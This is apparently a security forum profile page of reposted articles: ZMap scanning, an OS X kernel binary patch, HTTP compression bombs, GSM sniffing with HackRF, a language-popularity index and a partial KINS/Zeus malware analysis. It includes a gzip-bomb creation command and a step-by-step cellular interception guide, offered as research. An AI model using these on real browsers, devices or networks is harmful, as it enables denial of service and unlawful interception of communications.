Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. ZMap The Internet Scanner v1.0.3 released ZMap is an open-source network scanner that enables researchers to easily perform Internet-wide network studies. With a single machine and a well provisioned network uplink, ZMap is capable of performing a complete scan of the IPv4 address space in under 45 minutes, approaching the theoretical limit of gigabit Ethernet. ZMap can be used to study protocol adoption over time, monitor service availability, and help us better understand large systems distributed across the Internet. ZMap is designed to perform comprehensive scans of the IPv4 address space or large portions of it. While ZMap is a powerful tool for researchers, please keep in mind that by running ZMap, you are potentially scanning the ENTIRE IPv4 address space at over 1.4 million packets per second. Before performing even small scans, we encourage users to contact their local network administrators and consult our list of scanning best practices. By default, ZMap will perform a TCP SYN scan on the specified port at the maximum rate possible. A more conservative configuration that will scan 10,000 random addresses on port 80 at a maximum 10 Mbps can be run as follows: $ zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.txt Download: https://zmap.io/download.html
  2. Hacking the OS X Kernel for Fun and Profiles Posted on Tuesday, August 13, 2013. My last post described how user-level CPU profilers work, and specifically how Google’s pprof profiler gathers its CPU profiles with the help of the operating system. The specific feature needed from the operating system is the profiling timer provided by setitimer(2) and the SIGPROF signals that it delivers. If the operating system’s implementation of that feature doesn’t work, then the profiler doesn’t work. This post looks at a common bug in Unix implementations of profiling signals and the fix for OS X, applied by editing the OS X kernel binary. If you haven’t read “How to Build a User-Level CPU Profiler,’’ you might want to start there. Unix and Signals and Threads My earlier post referred to profiling programs, without mention of processes or threads. Unix in general and SIGPROF in particular predate the idea of threads. SIGPROF originated in the 4.2BSD release of Berkeley Unix, published in 1983. In Unix at the time, a process was a single thread of execution. Threads did not come easily to Unix. Early implementations were slow and buggy and best avoided. Each of the popular Unix variants added thread support independently, with many shared mistakes. Even before we get to implementation, many of the original Unix APIs are incompatible with the idea of threads. Multithreaded processes allow multiple threads of execution in a single process address space. Unix maintains much per-process state, and the kernel authors must decide whether each piece of state should remain per-process or change to be per-thread. For example, the single process stack must be split into per-thread stacks: it is impossible for independently executing threads to be running on a single stack. Because there are many threads, thread stacks tend to be smaller than the one big process stack that non-threaded Unix programs had. As a result, it can be important to define a separate stack for running signal handlers. That setting is per-thread, for the same reason that ordinary stacks are per-thread. But the choice of handler is per-process. File descriptors are per-process, but then one thread might open a file moments before another thread forks and execs a new program. In order for the open file not to be inherited by the new program, we must introduce a new variant of open(2) that can open a file descriptor atomically marked “close on exec.’’ And not just open: every system call that creates a new file descriptor needs a variant that creates the file descriptor “close on exec.’’ Memory is per-process, so malloc must use a lock to serialize access by independent threads. But again, one thread might acquire the malloc lock moments before another thread forks and execs a new program. The fork makes a new copy of the current process memory, including the locked malloc lock, and that copy will never see the unlock by the thread in the original program. So the child of fork can no longer use malloc without occasional deadlocks. That’s just the tip of the iceberg. There are a lot of changes to make, and it’s easy to miss one. Profiling Signals Here’s a thread-related change that is easy to miss. The goal of the profiling signal is to enable user-level profiling. The signal is sent in response to a program using up a certain amount of CPU time. More specifically, in a multithreaded kernel, the profiling signal is sent when the hardware timer interrupts a thread and the timer interrupt handler finds that the execution of that thread has caused the thread’s process’s profiling timer to expire. In order to profile the code whose execution triggered the timer, the profiling signal must be sent to the thread that is running. If the signal is sent to a thread that is not running, the profile will record idleness such as being blocked on I/O or sleeping as execution and will be neither accurate nor useful. Modern Unix kernels support sending a signal to a process, in which case it can be delivered to an arbitrary thread, or to a specific thread. Kill(2) sends a signal to a process, and pthread_kill(2) sends a signal to a specific thread within a process. Before Unix had threads, the code that delivered a profiling signal looked like psignal(p, SIGPROF), where psignal is a clearer name for the implementation of the kill(2) system call and p is the process with the timer that just expired. If there is just one thread per process, delivering the signal to the process cannot possibly deliver it to the wrong thread. In multithreaded programs, the SIGPROF must be delivered to the running thread: the kernel must call the internal equivalent of pthread_kill(2), not kill(2). FreeBSD and Linux deliver profiling signals correctly. Empirically, NetBSD, OpenBSD, and OS X do not. (Here is a simple C test program.) Without correct delivery of profiling signals, it is impossible to build a correct profiler. OS X Signal Delivery To Apple’s credit, the OS X kernel sources are published and open source, so we can look more closely at the buggy OS X implementation. The profiling signals are delivered by the function bsd_ast in the file kern_sig.c. Here is the relevant bit of code: voidbsd_ast(thread_t thread) { proc_t p = current_proc(); ... if (timerisset(&p->p_vtimer_prof.it_value)) { uint32_t microsecs; task_vtimer_update(p->task, TASK_VTIMER_PROF, &microsecs); if (!itimerdecr(p, &p->p_vtimer_prof, microsecs)) { if (timerisset(&p->p_vtimer_prof.it_value)) task_vtimer_set(p->task, TASK_VTIMER_PROF); else task_vtimer_clear(p->task, TASK_VTIMER_PROF); psignal(p, SIGPROF); } } ... } The bsd_ast function is the BSD half of the OS X timer interrupt handler. If profiling is enabled, bsd_ast decrements the timer and sends the signal if the timer expires. The innermost if statement is resetting the the timer state, because setitimer(2) allows both one-shot and periodic timers. As predicted, the code is sending the profiling signal to the process, not to the current thread. There is a function psignal_uthread defined in the same source file that sends a signal instead to a specific thread. One possible fix is very simple: change psignal to psignal_uthread. I filed a report about this bug as Apple Bug Report #9177434 in March 2011, but the bug has persisted in subsequent releases of OS X. In my report, I suggested a different fix, inside the implementation of psignal, but changing psignal to psignal_uthread is even simpler. Let’s do that. Patching the Kernel It should be possible to rebuild the OS X kernel from the released sources. However, I do not know whether the sources are complete, and I do not know what configuration I need to use to recreate the kernel on my machine. I have no confidence that I’d end up with a kernel appropriate for my computer. Since the fix is so simple, it should be possible to just modify the standard OS X kernel binary directly. That binary lives in /mach_kernel on OS X computers. If we run gdb on /mach_kernel we can see the compiled machine code for bsd_ast and find the section we care about. $ gdb /mach_kernel(gdb) disas bsd_astDump of assembler code for function bsd_ast:0xffffff8000568a50 <bsd_ast+0>: push %rbp0xffffff8000568a51 <bsd_ast+1>: mov %rsp,%rbp...if (timerisset(&p->p_vtimer_prof.it_value))0xffffff8000568b7b <bsd_ast+299>: cmpq $0x0,0x1e0(%r15)0xffffff8000568b83 <bsd_ast+307>: jne 0xffffff8000568b8f <bsd_ast+319>0xffffff8000568b85 <bsd_ast+309>: cmpl $0x0,0x1e8(%r15)0xffffff8000568b8d <bsd_ast+317>: je 0xffffff8000568b9f <bsd_ast+335>task_vtimer_set(p->task, TASK_VTIMER_PROF);0xffffff8000568b8f <bsd_ast+319>: mov 0x18(%r15),%rdi0xffffff8000568b93 <bsd_ast+323>: mov $0x2,%esi0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set>0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568bad <bsd_ast+349>task_vtimer_clear(p->task, TASK_VTIMER_PROF);0xffffff8000568b9f <bsd_ast+335>: mov 0x18(%r15),%rdi0xffffff8000568ba3 <bsd_ast+339>: mov $0x2,%esi0xffffff8000568ba8 <bsd_ast+344>: callq 0xffffff8000237660 <task_vtimer_clear>psignal(p, SIGPROF);0xffffff8000568bad <bsd_ast+349>: mov %r15,%rdi0xffffff8000568bb0 <bsd_ast+352>: xor %esi,%esi0xffffff8000568bb2 <bsd_ast+354>: xor %edx,%edx0xffffff8000568bb4 <bsd_ast+356>: xor %ecx,%ecx0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224>... I’ve annotated the assembly with the corresponding C code in italics. The final sequence is odd. It should be a call to psignal but instead it is a call to code 224 bytes beyond the start of the threadsignal function. What’s going on is that psignal is a thin wrapper around psignal_internal, and that wrapper has been inlined. Since psignal_internal is a static function, it does not appear in the kernel symbol table, and so gdb doesn’t know its name. The definitions of psignal and psignal_uthread are: voidpsignal(proc_t p, int signum) { psignal_internal(p, NULL, NULL, 0, signum); } static void psignal_uthread(thread_t thread, int signum) { psignal_internal(PROC_NULL, TASK_NULL, thread, PSIG_THREAD, signum); } With the constants expanded, the call we’re seeing is psignal_internal(p, 0, 0, 0, 0x1b) and the call we want to turn it into is psignal_internal(0, 0, thread, 4, 0x1b). All we need to do is prepare the different argument list. Unfortunately, the thread variable was passed to bsd_ast in a register, and since it is no longer needed where we are in the function, the register has been reused for other purposes: thread is gone. Fortunately, bsd_ast’s one and only invocation in the kernel is bsd_ast(current_thread()), so we can reconstruct the value by calling current_thread ourselves. Unfortunately, there is no room in the 15 bytes from bsd_ast+349 to bsd_ast+364 to insert such a call and still prepare the other arguments. Fortunately, we can optimize a bit of the preceding code to make room. Notice that the calls to task_vtimer_set and task_vtimer_clear are passing the same argument list, and that argument list is prepared in both sides of the conditional: ... if (timerisset(&p->p_vtimer_prof.it_value)) 0xffffff8000568b7b <bsd_ast+299>: cmpq $0x0,0x1e0(%r15) 0xffffff8000568b83 <bsd_ast+307>: jne 0xffffff8000568b8f <bsd_ast+319> 0xffffff8000568b85 <bsd_ast+309>: cmpl $0x0,0x1e8(%r15) 0xffffff8000568b8d <bsd_ast+317>: je 0xffffff8000568b9f <bsd_ast+335> task_vtimer_set(p->task, TASK_VTIMER_PROF); 0xffffff8000568b8f <bsd_ast+319>: mov 0x18(%r15),%rdi 0xffffff8000568b93 <bsd_ast+323>: mov $0x2,%esi 0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set> 0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568bad <bsd_ast+349> task_vtimer_clear(p->task, TASK_VTIMER_PROF); 0xffffff8000568b9f <bsd_ast+335>: mov 0x18(%r15),%rdi 0xffffff8000568ba3 <bsd_ast+339>: mov $0x2,%esi 0xffffff8000568ba8 <bsd_ast+344>: callq 0xffffff8000237660 <task_vtimer_clear> psignal(p, SIGPROF); 0xffffff8000568bad <bsd_ast+349>: mov %r15,%rdi 0xffffff8000568bb0 <bsd_ast+352>: xor %esi,%esi 0xffffff8000568bb2 <bsd_ast+354>: xor %edx,%edx 0xffffff8000568bb4 <bsd_ast+356>: xor %ecx,%ecx 0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d 0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224> ... We can pull that call setup above the conditional, eliminating one copy and giving ourselves nine bytes to use for delivering the signal. A call to current_thread would take five bytes, and then moving the result into an appropriate register would take two more, so nine is plenty. In fact, since we have nine bytes, we can inline the body of current_thread—a single nine-byte mov instruction—and change it to store the result to the correct register directly. That avoids needing to prepare a position-dependent call instruction. The final version is: ... 0xffffff8000568b7b <bsd_ast+299>: mov 0x18(%r15),%rdi 0xffffff8000568b7f <bsd_ast+303>: mov $0x2,%esi 0xffffff8000568b84 <bsd_ast+308>: cmpq $0x0,0x1e0(%r15) 0xffffff8000568b8c <bsd_ast+316>: jne 0xffffff8000568b98 <bsd_ast+328> 0xffffff8000568b8e <bsd_ast+318>: cmpl $0x0,0x1e8(%r15) 0xffffff8000568b96 <bsd_ast+326>: je 0xffffff8000568b9f <bsd_ast+335> 0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set> 0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568ba4 <bsd_ast+340> 0xffffff8000568b9f <bsd_ast+335>: callq 0xffffff8000237660 <task_vtimer_clear> 0xffffff8000568ba4 <bsd_ast+340>: xor %edi,%edi 0xffffff8000568ba6 <bsd_ast+342>: xor %esi,%esi 0xffffff8000568ba8 <bsd_ast+344>: mov %gs:0x8,%rdx 0xffffff8000568bb1 <bsd_ast+353>: mov $0x4,%ecx 0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d 0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224> ... If we hadn’t found the duplicate call setup to factor out, another possible approach would have been to factor the two very similar code blocks handling SIGVTALRM and SIGPROF into a single subroutine, sitting in the middle of the bsd_ast function code, and to call it twice. Removing the second copy of the code would leave plenty of space for the longer psignal_uthread call setup. The code we’ve been using is from OS X Mountain Lion, but all versions of OS X have this bug, and the relevant bits of bsd_ast haven’t changed from version to version, although the compiler and therefore the generated code do change. Even so, all have the basic pattern and all can be fixed with the same kind of rewrite. Using the Patch If you use the Go or the C++ gperftools and want accurate CPU profiles on OS X, I’ve packaged up the binary patcher as code.google.com/p/rsc/cmd/pprof_mac_fix. It can handle OS X Snow Leopard, Lion, and Mountain Lion. Will OS X Mavericks need a fix too? We’ll see. Further Reading Binary patching is an old, venerable technique. This is just a simple instance of it. If you liked reading about this, you may also like to read Jeff Arnold’s paper “Ksplice: Automatic Rebootless Kernel Updates.’’ Ksplice can construct binary patches for Linux security vulnerabilities and apply them on the fly to a running system. Sursa: research!rsc: Hacking the OS X Kernel for Fun and Profiles
  3. Vulnerabilities that just won't die - Compression Bombs Recently Cyberis has reviewed a number of next-generation firewalls and content inspection devices - a subset of the test cases we formed related to compression bombs - specifically delivered over HTTP. The research prompted us to take another look at how modern browsers handle such content given that the vulnerability (or perhaps more accurately, ‘common weakness’ - CWE - CWE-409: Improper Handling of Highly Compressed Data (Data Amplification) (2.5)) has been reported and well known for over ten years. The results surprised us - in short, the majority of web browsers are still vulnerable to compression bombs leading to various denial-of-service conditions, including in some cases, full exhaustion of all available disk space with no user input. Introduction to HTTP Compression HTTP compression is a capability widely supported by web browsers and other HTTP User-Agents, allowing bandwidth and transmission speeds to be maximised between client and server. Supporting clients will advertise supported compression schemas, and if a mutually supported scheme can be negotiated, the server will respond with a compressed HTTP response. Compatible User-Agents will typically decompress encoded data on-the-fly. HTML content, images and other files transmitted are usually handled in memory (allowing pages to rendered as quickly as possible), whilst larger file downloads will usually be decompressed straight to disk to prevent unnecessary consumption of memory resources on the client. Gzip (RFC1952) is considered the most widely supported compression schema in use today, although the common weaknesses discussed in this post are applicable to all schemas in use today. What is a Compression Bomb? Quite simply, a compression bomb is compressed content that extracts to a size much larger than the developer expected; in other words, incorrect handling of highly compressed data. This can result in various denial-of-service conditions, for example memory, CPU and free disk space exhaustion. Using an entropy rate of zero (for example, /dev/zero), coupled with multiple rounds of encoding that modern browsers support (see our ResponseCoder post), a 43 Kilobyte HTTP server response will equate to a 1 Terabyte file when decompressed by a receiving client - an effective compression ratio of 25,127,100:1. It is trivial to make a gzip bomb on the Linux command line - see below for an example of a 10MB file being compressed to just 159 bytes using two rounds of gzip compression: $ dd if=/dev/zero bs=10M count=1 | gzip -9 | gzip -9 | wc -c 1+0 records in 1+0 records out 10485760 bytes (10 MB) copied, 0.149518 s, 70.1 MB/s 159 Testing Framework Cyberis has released a testing framework, both for generic HTTP response tampering and various sizes of gzip bombs. GzipBloat (https://www.github.com/cyberisltd/GzipBloat) is a PHP script to deliver pre-compressed gzipped content to a browser, specifying the correct HTTP response headers for the number of encoding rounds used, and optionally a ‘Content-Disposition’ header. A more generic response tampering framework - ResponseCoder (https://www.github.com/cyberisltd/ResponseCoder) - allows more fine grained control, although content is currently compressed on the fly - limiting its effectiveness when used to deliver HTTP compression bombs. Both tools are designed to assist you in testing both intermediary devices (content inspection/next-generation firewalls etc.) and browsers for compression bomb vulnerabilities. During our tests, we delivered compressed content in a variety of different forms, both as ‘file downloads’ and in-line ‘HTML content’. The exact tests we conducted and the results can be read in our more detailed paper on this topic here. Is my Browser Vulnerable? It is actually easier to name the browser that is not vulnerable - namely Opera - all other major desktop browsers (Internet Explorer, Firefox, Chrome, Safari) available today exhibited at least one denial-of-service condition during our test. The most serious condition observed was an effective denial-of-service against Windows operating systems when a large gzip encoded file is returned with a ‘Content-Disposition’ header - no user interaction was required to exploit the vulnerability, and recovery from the condition required knowledge of the Temporary Internet Files directory structure and command line access. This seemed to affect all recent versions of IE, including IE11 on Windows 8.1 Preview. Our results demonstrated that the most popular web browsers in use today are vulnerable to various denial-of-service conditions - namely memory, CPU and free disk space consumption - by failing to consider the high compression ratios possible from data with an entropy rate of zero. Depending on the HTTP response headers used, vulnerable browsers will either decompress the content in memory, or directly to disk - only terminating when operating system resources are exhausted. Conclusion With the growth of mobile data connectivity, improvements in data compression for Internet communications has become highly desirable from a performance perspective, but extensions to these techniques outside of original protocol specifications can have unconsidered impacts for security. Although compression bombs have been a known threat for a number of years, the growing ubiquity of advanced content inspection devices, and the proliferation User-Agents which handle compression mechanisms differently, has substantially changed the landscape for these types of attack. The attacks discussed here will provide an effective denial-of-service against a number of popular client browsers, but the impact in these cases is rather limited. Ultimately, the greater impact of this style of attack is likely to be felt by intermediate content inspection devices with a large pool of users. It is possible a number of advanced content inspection devices may be susceptible to these decompression denial-of-service attacks themselves, potentially as the result of a single server-client response. In an environment with high availability requirements and a large pool of users, a denial-of-service attack which could be launched by a single malicious Internet server could have a devastating impact. Posted by Cyberis at 07:36 Sursa: Cyberis Blog: Vulnerabilities that just won't die - Compression Bombs
  4. [h=3]Sniffing GSM with HackRF[/h]by admin » Wed Aug 14, 2013 1:29 am I will open by saying only sniff your own system or a system you have been given permission to work on, Sniffing a public network in your country may be illegal. I recently had a play with sniffing some gsm using the HackRF, The clock was a little unstable and drifted quite a bit but in the end I was able to view lots of different system messages etc. I will assume you have a working linux system with gnuradio and hackrf running for this turotial, If not you can use the live cd which I referenced in the software section of the forum its a great tool and the hackrf works right out of the box. First thing to do is find out the freq of a local gsm tower for this I used gqrx which is pre loaded on the live cd, open it up and have a look around the 900mhz band and you should see something like the image below. gqerx.png (274.82 KiB) Viewed 6938 times You can see the non hopping channel at 952Mhz and another at 944.2Mhz write down the approximate frequency for the later step. Now we need to install Airprobe using the following commands. git clone git://git.gnumonks.org/airprobe.git cd airprobe/gsmdecode ./bootstrap ./configure make cd airprobe/gsm-receiver ./bootstrap ./configure make Thats all there is too it we can now start recieving some gsm first things first start wireshark with the following command: sudo wireshark Select "lo" as the capture device and enter gsmtap in the filter window like in the image below: wireshark.png (66.89 KiB) Viewed 6938 times Now go back to your terminal window and enter the following: cd airprobe/gsm-receiver/src/python ./gsm_receive_rtl.py -s 2e6 A window will pop up and the first thing is to do is uncheck auto gain and set the slider to full, then enter the gsm frequency you noted before as the center frequency. Also select peak hold and average in the top windows trace options like so: spectrum.png (109.9 KiB) Viewed 6938 times You will see that only signal on the right (blue line) consitently stays in place over the peak hold (green line) indicating that it is the non hopping channel, All we need to do to start decoding is in the top window click on the center of that frequency hump. You may see some error coming up but that is ok eventually it will start to capture data something like this: data.png (225.52 KiB) Viewed 6938 times You can now see the gsm data popping up in wireshark, as I said at the beginning the hackrf clock does drift so you will need to keep clicking to re-center the correct frequency but all in all it works pretty good. As silly as it may sound wraping your hack rf in a towel or similar really helps the thermal stability of the clock and reduces drift. Now this "hack" is obviously not very usefull on its own but I think atleast it helps to show the massive amounts of potential there is in the HackRF. Sursa: BinaryRF.com • View topic - Sniffing GSM with HackRF
  5. Scanning the Internet in 45 Minutes by Dennis Fisher The Internet is a big thing. Or, more accurately, a big collection of things. Figuring out exactly how many things, and what vulnerabilities those things contain has always been a challenge for researchers, but a new tool released by a group from the University of Michigan that is capable of scanning the entire IPv4 address space in less than an hour. There have been a handful of Internet-wide scans done by various organizations over the years, but most of them have not had a security motivation. And they can take days or weeks, depending upon how the scan is done and what the researchers were trying to accomplish. But the new Zmap tool built by the Michigan researchers has the ability to perform an Internet-wide scan in about 45 minutes while running on an ordinary server. The tool, which the team presented at the USENIX Security conference last week, is open-source and freely available for other researchers to use. To demonstrate the capabilities of Zmap, the Michigan team, which comprises J. Alex Halderman, an assistant professor, and Eric Wustrow and Zakir Durumeric, both doctoral candidates, ran a scan of the entire IPv4 address space, returning results from more 34 million hosts, or what they estimate to be about 98 percent of the machines in that space. Zmap is designed specifically to bypass some of the speed obstacles that have slowed down some of the previous large-scale scans of the Internet. The researchers removed some of the considerations for machines on the other end of the scan, for example assuming that they sit on well-provisioned networks and can handle fast probes. The result is that the tool can scan more than 1,300 times faster than the venerable Nmap scanner. “While Nmap adapts its transmission rate to avoid saturating the source or target networks, we assume that the source network is well provisioned (unable to be saturated by the source host), and that the targets are randomly ordered and widely dispersed (so no distant network or path is likely to be saturated by the scan). Consequently, we attempt to send probes as quickly as the source’s NIC can support, skipping the TCP/IP stack and generating Ethernet frames directly. We show that ZMap can send probes at gigabit line speed from commodity hardware and entirely in user space,” the researchers say in their paper, “Zmap: Fast Internet-Wide Scanning and Its Security Implications”. “While Nmap maintains state for each connection to track which hosts have been scanned and to handle timeouts and retransmissions, ZMap forgoes any per-connection state. Since it is intended to target random samples of the address space, ZMap can avoid storing the addresses it has already scanned or needs to scan and instead selects addresses according to a random permutation generated by a cyclic multiplicative group.” That stateless scanning, the researchers said, allowed Zmap to get both faster response times and better coverage of the target address space. As for practical applications of the tool, the researchers already have found several. In the last year, the team ran 110 separate scans of the entire HTTPS infrastructure, finding a total of 42 million certificates. Interestingly, they only found 6.9 million certificates that were trusted by browsers. They also found two separate sets of mis-issued SSL certificates, something that’s been a serious problem in recent years. The Zmap team also wrote a custom probe to look for the UPnP vulnerability that HD Moore of Rapid 7 discovered in January. After scanning 15.7 million devices, they found that 3.3 million were still vulnerable. That bug can be exploited with a single packet. “Given that these vulnerable devices can be infected with a single UDP packet [25], we note that these 3.4 million devices could have been infected in approximately the same length of time—much faster than network operators can reasonably respond or for patches to be applied to vulnerable hosts. Leveraging methodology similar to ZMap, it would only have taken a matter of hours from the time of disclosure to infect every publicly available vulnerable host,” the researchers say in the paper. Sursa: Scanning the Internet in 45 Minutes | Threatpost
  6. [h=1]Java tops C as most popular language in developer index[/h] [h=2]As Tiobe factors in more sites in its assessment, Java rises, while C and Objective-C drop in the rankings[/h] By Paul Krill | InfoWorld Java has retaken the lead in this month's Tiobe index of the most popular programming languages, which now assesses more search engines to calculate the numbers. The C language barely slipped to the second spot in the August rendition of the Tiobe Programming Community index. Java last held the lead in March. "C and Objective-C are the biggest victims of adding the 16 new search engines," with Objective-C dropping from third place last month to fourth place, Tiobe said. Winners are the Google Go language, which rose to the 26th ranking after being ranked 42nd; LabView, rising from 100 to 49; and Openedge ABL, moving from 129th to 57th. Tiobe gauges language popularity by assessing searches about languages made on popular sites like Google, Yahoo, Baidu, and Wikipedia. Specifically, Tiobe counts skilled engineers, courses, and third-party vendors pertinent to a language. Most of the new indexes are from the United States and China, with Japanese and Brazilian sites also added to the mix. Reddit and MyWeb are among the new sites being gauged. Still, the new sites count for only a small portion when calculating the ratings. "Yes, we added more search engines to improve the validity of the index," Tiobe Managing Director Paul Jansen said. "Another related reason is to make sure that there are less fluctuations in rankings." Tiobe's rankings have had their critics, including Andi Gutmans, CEO of PHP tools vendor Zend Technologies. And consistency among these indexes is now in question. Last month, Tiobe and the rival Pypl Popularity of Programming Language index both had decidedly different takes on the PHP language, with Tiobe saying it was making a comeback while Pypl said it was declining. For the month of August, Java turned up in 15.978 percent of Tiobe's searches, barely ahead of C, at 15.974 percent. Rounding out the top five were C++ (9.371 percent), Objective-C (8.082 percent), and PHP (6.694 percent). Pypl, which assesses just the volume of language tutorials searched in Google, also had Java tops (a 27.2 percent share of the index). It was followed by PHP (14.3 percent), C# (9.8 percent), Python (also 9.8 percent), and C++ (9.1 percent). This story, "Java tops C as most popular language in developer index," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter. Sursa: Java tops C as most popular language in developer index | Java programming - InfoWorld
  7. KINS malware: initialization and DNA paternity test A new post about KINS, I don’t have anything interesting on my hands right now so I decided to go on with the analysis of it. This was my first idea, but someone (Thanks Michael) suggested to me something to add to the analysis. The idea comes from a simple question: is KINS a new myth or is it just born from the leaked Zeus source code? Well, I’ll start looking at KINS with an eye to Zeus trying to understand if there are some similarities or not. Holidays are coming and I don’t have a lot of free time for a complete analysis of the entire malware, right now you have to be satisfied with just the ground of KINS and Zeus_leaked_source_code, the initialization part only. It’s generally an annoying job but from the ground you can understand a lot of information of the malware. Anyway, I’ll try to write something light and readable. Reference KINS malware: md5 = 7b5ac02e80029ac05f04fa5881a911b2 Reference Zeus leaked source code: version 2.0.8.9 Encrypted strings Strings are always a good starting point and like almost all the malwares out there every suspicious string has been crypted, most of the time a simple xor encryption would suffice. KINS doesn’t decrypt all the strings in a unique time, it decrypts a single string when it has to use it. Inside the .text section there’s an array of _STRINGINFO structures, each structure contains the necessary data about a single encrypted string: 00000000 _STRINGINFO struc ; (sizeof=0x8) 00000000 key db ? ; xor key used to decrypt the encoded string 00000001 db ? ; undefined ; unused because xor key is 1 byte only 00000002 size dw ? ; size of the string to decrypt 00000004 encodedString dd ? ; string to decrypt 00000008 _STRINGINFO ends When the malware needs a string it calls DecryptStringW passing an index to it, the index is the array index: 4231CA DecryptStringW proc near 4231CA movzx eax, ax ; Id of the string to decrypt 4231CD lea eax, STRINGINFO[eax*8] ; current _STRINGINFO identified by the index 4231D4 xor ecx, ecx 4231D6 xor edx, edx ; iterator index 4231D8 cmp cx, [eax+_STRINGINFO.size] 4231DC jnb short loc_423209 4231DE push ebx 4231DF push edi 4231E0 DecryptStringIterator: 4231E0 mov edi, [eax+_STRINGINFO.encodedString] 4231E3 movzx ebx, [eax+_STRINGINFO.key] 4231E6 movzx ecx, dx 4231E9 movsx di, byte ptr [edi+ecx] 4231EE xor di, bx ; xor with key 4231F1 xor di, dx ; xor with iterator index 4231F4 mov ebx, 0FFh 4231F9 and di, bx ; the result is a unicode string 4231FC inc edx ; increase iterator index 4231FD mov [esi+ecx*2], di ; decrypt byte by byte 423201 cmp dx, [eax+2] 423205 jb short DecryptStringIterator 423207 pop edi 423208 pop ebx 423209 loc_423209: 423209 movzx eax, [eax+_STRINGINFO.size] 42320D xor ecx, ecx 42320F mov [esi+eax*2], cx ; put NULL at the end of the string 423213 retn 423213 DecryptStringW endp A double xor operation over every byte of the encrypted string. KINS uses the same structure (_STRINGINFO) and the same decryption method (DecryptStringW) used by Zeus_leaked_source_code. It’s a perfect copy&paste approach. There are a lot of strings declared inside the exe, a comparison of the decrypted string is necessary. To decrypt all the string inside KINS you can use this simple idc function script: static ListStrings(address){ auto iString; auto sInfo; auto xorKey; auto sLen; auto crypted; auto i; Message("\nDecrypted string list:\n"); iString = 0; while((address + iString) < 0x4026C8) { sInfo = address + iString; xorKey = Byte(sInfo); if (xorKey != 0) { sLen = Word(sInfo+2); crypted = Dword(sInfo+4); if (!((crypted MaxEA()))) { Message("\""); for(i=0;i<sLen;i++) Message("%c", Byte(crypted+i) ^ xorKey ^ i); Message("\"\n"); iString = iString + 7; // sizeof(_STRINGINFO) - 1 } } iString++; } } The result list contains a lot of interesting strings but comparing this list with the original one provided by Zeus you can note a lot of equal strings. I have to admit that there are some new entries but the core remains the same. Init KINS initialization resides inside a snippet of code starting @407A25 and ending @407C73. It performs all the necessary tasks needed for a clear execution of itself. Looking inside the code you’ll notice that Init procedure is referenced by two different places, one at the beginning of the malware and the other one during its execution. Besides, Init has a lot of calls inside but not all are executed at the first time. That’s because KINS has 2 level of initialization, it has to sets some things now and some later. The first level of execution is performed at the very beginning of the code and the second level is executed when particular operation has to be done. I’ll tell you something more about this 2° level in the next blog post. I.e.: the process injection feature requires the execution of parts of the Init procedure that are not scheduled in the first execution of Init. I think KINS doesn’t want to spoil a lot in his first part of the code, and prefer to follow an exact time scheme. I said KINS but I should say Zeus because this particular code structure is the same used by Zeus. Moreover, there’s another piece of code taken by a copy&paste: to decide what to setup the first time and what later Init checks the dword value passed as a parameter, I call it “flags”. flags is checked inside some if statements, here is a practical example: .text:00407A31 mov eax, [ebp+flags] // INITF_NORMAL_START the first time, (INITF_INJECT_START | INITF_HOOKS_FOR_USER) the next one ... .text:00407A36 mov esi, eax .text:00407A38 and esi, 1 // Check for INITF_INJECT_START flag bit .text:00407A3B mov [esp+420h+flags_Core], esi .text:00407A3F jnz short loc_407A4B .text:00407A41 xor ebx, ebx // First time .text:00407A43 mov processFlags, ebx .text:00407A49 jmp short loc_407A4D .text:00407A4B xor ebx, ebx // Second time .text:00407A4D call InitLoadModules flags represents the value passed to Init, the first time flags’s value is 0 (INIT_NORMAL_START) and the second time is 3 (INITF_INJECT_START | INITF_HOOKS_FOR_USER). I have started the analysis right now but copy&paste method has been used a lot of times. For a better explanation I announce you that KINS is heavily based on Zeus_leaked_source_code. Some parts are really equals, some parts have minor changes only, some of them have interesting additions and some of them are from Zeus version above 2.0.8.9. Yes, KINS writers took something from more than one Zeus version. Copy&paste As far as I’ve seen the core of the malware is equal to Zeus’s core. It’s based on the same structures, variables and code design. Here is a list of things that are directly taken from Zeus. - Global variables Global variables is one of the first things I tried to understand, and I have to say that most of them are simple flags used to recognize a particular status or event. You can recognize them from the code looking at mov instructions: 407C34 mov ref_count, ebx 407C3A mov reportFile, ax 407C40 mov registryKey, ax 407C46 mov readWriteMutex_localconfig, ax 407C4C mov registryKey_localconfig, ax 407C52 mov readWriteMutex_localsetting, ax 407C58 mov registryKey_localsetting, ax - Memory initialization The malware will need dynamic allocated memory, you can find the initialization memory code starting from @407A5D. This time you can see a mix of flag/variable init: 407A5D push ebx 407A5E push 80000h 407A63 push ebx 407A64 call ds:HeapCreate 407A6A mov mainHeap, eax 407A6F cmp eax, ebx 407A71 jnz short HeapCreate_OK 407A73 call ds:GetProcessHeap 407A79 mov hHeap, eax 407A7E mov heapCreated, bl ; heapCreated = false; 407A84 jmp short loc_407A8D 407A86 HeapCreate_OK: 407A86 mov heapCreated, 1 ; heapCreated = true; mainHeap is a global variable and heapCreated is just a flag used to set the success or not of the heap creation process. - Crypt initialization Crypto is used by KINS and like all the other functionalities it requires a small place inside Init. 407A9A mov _last_rand_tickcount, ebx ; _last_rand_tickcount = 0; 407AA0 mov crc32Intialized, bl ; crc32Intalized = false; From the only two lines of code used to perform this init operation it’s hard to predict the meaning of them but, again, flag and var are used. If you want to understand some more things about them you can try with xref IDA option. After some more investigations you can understand their real use: _last_rand_tickcount is used in comparison between a value 